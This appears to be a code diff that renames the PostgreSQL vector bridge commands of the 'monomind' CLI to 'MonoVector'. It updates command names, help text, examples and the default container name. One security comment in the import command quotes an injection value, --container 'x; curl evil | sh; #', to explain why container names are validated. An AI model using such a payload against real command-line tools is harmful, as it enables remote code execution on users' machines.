@@ -24,7 +24,7 @@ function formatEmbedding(embedding, dimensions = 384) {
|
|
|
24
24
|
if (padded.length > dimensions) {
|
|
25
25
|
padded.length = dimensions;
|
|
26
26
|
}
|
|
27
|
-
return `'[${padded.join(',')}]'::
|
|
27
|
+
return `'[${padded.join(',')}]'::monovector(${dimensions})`;
|
|
28
28
|
}
|
|
29
29
|
/**
|
|
30
30
|
* Escape string for PostgreSQL
|
|
@@ -63,11 +63,11 @@ ON CONFLICT (key, namespace) DO UPDATE SET
|
|
|
63
63
|
updated_at = NOW();`;
|
|
64
64
|
}
|
|
65
65
|
/**
|
|
66
|
-
*
|
|
66
|
+
* MonoVector Import command - import from sql.js/JSON to PostgreSQL
|
|
67
67
|
*/
|
|
68
68
|
export const importCommand = {
|
|
69
69
|
name: 'import',
|
|
70
|
-
description: 'Import data from sql.js/JSON memory to
|
|
70
|
+
description: 'Import data from sql.js/JSON memory to MonoVector PostgreSQL',
|
|
71
71
|
aliases: ['load', 'migrate-data'],
|
|
72
72
|
options: [
|
|
73
73
|
{
|
|
@@ -133,7 +133,7 @@ export const importCommand = {
|
|
|
133
133
|
short: 'c',
|
|
134
134
|
description: 'Docker container name to exec into',
|
|
135
135
|
type: 'string',
|
|
136
|
-
default: '
|
|
136
|
+
default: 'monovector-postgres',
|
|
137
137
|
},
|
|
138
138
|
{
|
|
139
139
|
name: 'verbose',
|
|
@@ -144,17 +144,17 @@ export const importCommand = {
|
|
|
144
144
|
},
|
|
145
145
|
],
|
|
146
146
|
examples: [
|
|
147
|
-
{ command: 'monomind
|
|
148
|
-
{ command: 'monomind
|
|
149
|
-
{ command: 'monomind
|
|
150
|
-
{ command: 'monomind
|
|
147
|
+
{ command: 'monomind monovector import --input memory-export.json', description: 'Import from JSON file' },
|
|
148
|
+
{ command: 'monomind monovector import --input data.json --output import.sql', description: 'Generate SQL file (dry-run)' },
|
|
149
|
+
{ command: 'monomind monovector import --from-memory', description: 'Export current memory and import' },
|
|
150
|
+
{ command: 'monomind monovector import --input data.json --container my-postgres', description: 'Import using custom container' },
|
|
151
151
|
],
|
|
152
152
|
action: async (ctx) => {
|
|
153
153
|
const inputFile = ctx.flags.input;
|
|
154
154
|
const fromMemory = ctx.flags['from-memory'];
|
|
155
155
|
const outputFile = ctx.flags.output;
|
|
156
156
|
const batchSize = ctx.flags['batch-size'] || 100;
|
|
157
|
-
const containerName = ctx.flags.container || '
|
|
157
|
+
const containerName = ctx.flags.container || 'monovector-postgres';
|
|
158
158
|
// SECURITY: containerName is interpolated into shell commands below.
|
|
159
159
|
// Without validation, --container 'x; curl evil | sh; #' becomes a shell
|
|
160
160
|
// metachar payload. Validate against Docker's documented container-name
|
|
@@ -165,7 +165,7 @@ export const importCommand = {
|
|
|
165
165
|
}
|
|
166
166
|
const verbose = ctx.flags.verbose;
|
|
167
167
|
output.writeln();
|
|
168
|
-
output.writeln(output.bold('
|
|
168
|
+
output.writeln(output.bold('MonoVector PostgreSQL Import'));
|
|
169
169
|
output.writeln(output.dim('='.repeat(50)));
|
|
170
170
|
output.writeln();
|
|
171
171
|
// Validate input
|
|
@@ -173,8 +173,8 @@ export const importCommand = {
|
|
|
173
173
|
output.printError('Either --input <file> or --from-memory is required');
|
|
174
174
|
output.writeln();
|
|
175
175
|
output.printInfo('Examples:');
|
|
176
|
-
output.writeln(' monomind
|
|
177
|
-
output.writeln(' monomind
|
|
176
|
+
output.writeln(' monomind monovector import --input memory-export.json');
|
|
177
|
+
output.writeln(' monomind monovector import --from-memory');
|
|
178
178
|
return { success: false, message: 'Missing input source' };
|
|
179
179
|
}
|
|
180
180
|
let entries = [];
|
|
@@ -217,7 +217,7 @@ export const importCommand = {
|
|
|
217
217
|
if (fromMemory) {
|
|
218
218
|
output.printInfo('Exporting from current Monomind memory...');
|
|
219
219
|
output.printWarning('Note: Run "npx monomind memory list --format json > memory-export.json" first');
|
|
220
|
-
output.printInfo('Then use: npx monomind
|
|
220
|
+
output.printInfo('Then use: npx monomind monovector import --input memory-export.json');
|
|
221
221
|
return { success: false, message: 'Use explicit JSON export first' };
|
|
222
222
|
}
|
|
223
223
|
if (entries.length === 0) {
|
|
@@ -235,7 +235,7 @@ export const importCommand = {
|
|
|
235
235
|
};
|
|
236
236
|
// Generate SQL statements
|
|
237
237
|
const sqlStatements = [];
|
|
238
|
-
sqlStatements.push('--
|
|
238
|
+
sqlStatements.push('-- MonoVector PostgreSQL Import');
|
|
239
239
|
sqlStatements.push(`-- Generated: ${new Date().toISOString()}`);
|
|
240
240
|
sqlStatements.push(`-- Total entries: ${entries.length}`);
|
|
241
241
|
sqlStatements.push('');
|
|
@@ -288,7 +288,7 @@ export const importCommand = {
|
|
|
288
288
|
output.printInfo(`Importing to PostgreSQL via container: ${containerName}`);
|
|
289
289
|
output.writeln();
|
|
290
290
|
// Write to temp file for execution
|
|
291
|
-
const tempFile = path.join(process.cwd(), '.
|
|
291
|
+
const tempFile = path.join(process.cwd(), '.monovector-import-temp.sql');
|
|
292
292
|
try {
|
|
293
293
|
fs.writeFileSync(tempFile, fullSQL);
|
|
294
294
|
output.printInfo('Executing import...');
|
|
@@ -1,9 +1,9 @@
|
|
|
1
1
|
/**
|
|
2
|
-
* CLI
|
|
3
|
-
* Management commands for
|
|
2
|
+
* CLI MonoVector PostgreSQL Bridge Command
|
|
3
|
+
* Management commands for MonoVector PostgreSQL integration
|
|
4
4
|
*
|
|
5
5
|
* Features:
|
|
6
|
-
* -
|
|
6
|
+
* - monovector/pgvector integration for vector operations
|
|
7
7
|
* - Attention mechanism embeddings
|
|
8
8
|
* - Graph Neural Network support
|
|
9
9
|
* - Hyperbolic embeddings (Poincare ball)
|
|
@@ -14,10 +14,10 @@
|
|
|
14
14
|
*/
|
|
15
15
|
import type { Command } from '../../types.js';
|
|
16
16
|
/**
|
|
17
|
-
*
|
|
17
|
+
* MonoVector PostgreSQL Bridge main command
|
|
18
18
|
*/
|
|
19
|
-
export declare const
|
|
20
|
-
export default
|
|
19
|
+
export declare const monovectorCommand: Command;
|
|
20
|
+
export default monovectorCommand;
|
|
21
21
|
export { initCommand } from './init.js';
|
|
22
22
|
export { setupCommand } from './setup.js';
|
|
23
23
|
export { importCommand } from './import.js';
|
|
@@ -1,9 +1,9 @@
|
|
|
1
1
|
/**
|
|
2
|
-
* CLI
|
|
3
|
-
* Management commands for
|
|
2
|
+
* CLI MonoVector PostgreSQL Bridge Command
|
|
3
|
+
* Management commands for MonoVector PostgreSQL integration
|
|
4
4
|
*
|
|
5
5
|
* Features:
|
|
6
|
-
* -
|
|
6
|
+
* - monovector/pgvector integration for vector operations
|
|
7
7
|
* - Attention mechanism embeddings
|
|
8
8
|
* - Graph Neural Network support
|
|
9
9
|
* - Hyperbolic embeddings (Poincare ball)
|
|
@@ -23,11 +23,11 @@ import { backupCommand } from './backup.js';
|
|
|
23
23
|
import { setupCommand } from './setup.js';
|
|
24
24
|
import { importCommand } from './import.js';
|
|
25
25
|
/**
|
|
26
|
-
*
|
|
26
|
+
* MonoVector PostgreSQL Bridge main command
|
|
27
27
|
*/
|
|
28
|
-
export const
|
|
29
|
-
name: '
|
|
30
|
-
description: '
|
|
28
|
+
export const monovectorCommand = {
|
|
29
|
+
name: 'monovector',
|
|
30
|
+
description: 'MonoVector PostgreSQL Bridge management',
|
|
31
31
|
aliases: ['rv', 'pgvector'],
|
|
32
32
|
subcommands: [
|
|
33
33
|
initCommand,
|
|
@@ -75,25 +75,25 @@ export const ruvectorCommand = {
|
|
|
75
75
|
},
|
|
76
76
|
],
|
|
77
77
|
examples: [
|
|
78
|
-
{ command: 'monomind
|
|
79
|
-
{ command: 'monomind
|
|
80
|
-
{ command: 'monomind
|
|
81
|
-
{ command: 'monomind
|
|
82
|
-
{ command: 'monomind
|
|
83
|
-
{ command: 'monomind
|
|
84
|
-
{ command: 'monomind
|
|
85
|
-
{ command: 'monomind
|
|
78
|
+
{ command: 'monomind monovector setup', description: 'Output Docker files and SQL for setup' },
|
|
79
|
+
{ command: 'monomind monovector import --input memory.json', description: 'Import from sql.js/JSON export' },
|
|
80
|
+
{ command: 'monomind monovector init --database mydb', description: 'Initialize MonoVector in PostgreSQL' },
|
|
81
|
+
{ command: 'monomind monovector status --verbose', description: 'Check connection and schema status' },
|
|
82
|
+
{ command: 'monomind monovector migrate --up', description: 'Run pending migrations' },
|
|
83
|
+
{ command: 'monomind monovector benchmark --vectors 10000', description: 'Run performance benchmark' },
|
|
84
|
+
{ command: 'monomind monovector optimize --analyze', description: 'Analyze and suggest optimizations' },
|
|
85
|
+
{ command: 'monomind monovector backup --output backup.sql', description: 'Backup MonoVector data' },
|
|
86
86
|
],
|
|
87
87
|
action: async (ctx) => {
|
|
88
88
|
// Default action: show help/status overview
|
|
89
89
|
output.writeln();
|
|
90
|
-
output.writeln(output.bold('
|
|
90
|
+
output.writeln(output.bold('MonoVector PostgreSQL Bridge'));
|
|
91
91
|
output.writeln(output.dim('='.repeat(60)));
|
|
92
92
|
output.writeln();
|
|
93
93
|
output.printBox([
|
|
94
|
-
'
|
|
94
|
+
'MonoVector provides PostgreSQL integration for Monomind with:',
|
|
95
95
|
'',
|
|
96
|
-
' -
|
|
96
|
+
' - monovector/pgvector extension for vector operations',
|
|
97
97
|
' - Attention mechanism embeddings',
|
|
98
98
|
' - Graph Neural Network (GNN) support',
|
|
99
99
|
' - Hyperbolic embeddings (Poincare ball model)',
|
|
@@ -103,20 +103,20 @@ export const ruvectorCommand = {
|
|
|
103
103
|
'',
|
|
104
104
|
' setup Output Docker files and SQL for setup',
|
|
105
105
|
' import Import from sql.js/JSON to PostgreSQL',
|
|
106
|
-
' init Initialize
|
|
106
|
+
' init Initialize MonoVector in PostgreSQL',
|
|
107
107
|
' migrate Run database migrations',
|
|
108
108
|
' status Check connection and schema status',
|
|
109
109
|
' benchmark Run performance benchmarks',
|
|
110
110
|
' optimize Analyze and optimize performance',
|
|
111
111
|
' backup Backup and restore data',
|
|
112
|
-
].join('\n'), '
|
|
112
|
+
].join('\n'), 'MonoVector PostgreSQL Bridge');
|
|
113
113
|
output.writeln();
|
|
114
|
-
output.printInfo('Run `monomind
|
|
114
|
+
output.printInfo('Run `monomind monovector <command> --help` for details');
|
|
115
115
|
output.writeln();
|
|
116
116
|
return { success: true };
|
|
117
117
|
},
|
|
118
118
|
};
|
|
119
|
-
export default
|
|
119
|
+
export default monovectorCommand;
|
|
120
120
|
// Re-export subcommands for direct access
|
|
121
121
|
export { initCommand } from './init.js';
|
|
122
122
|
export { setupCommand } from './setup.js';
|
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* CLI MonoVector Init Command
|
|
3
|
+
* Initialize MonoVector PostgreSQL Bridge
|
|
4
|
+
*/
|
|
5
|
+
import type { Command } from '../../types.js';
|
|
6
|
+
/**
|
|
7
|
+
* Initialize MonoVector in PostgreSQL
|
|
8
|
+
*/
|
|
9
|
+
export declare const initCommand: Command;
|
|
10
|
+
export default initCommand;
|
|
11
|
+
//# sourceMappingURL=init.d.ts.map
|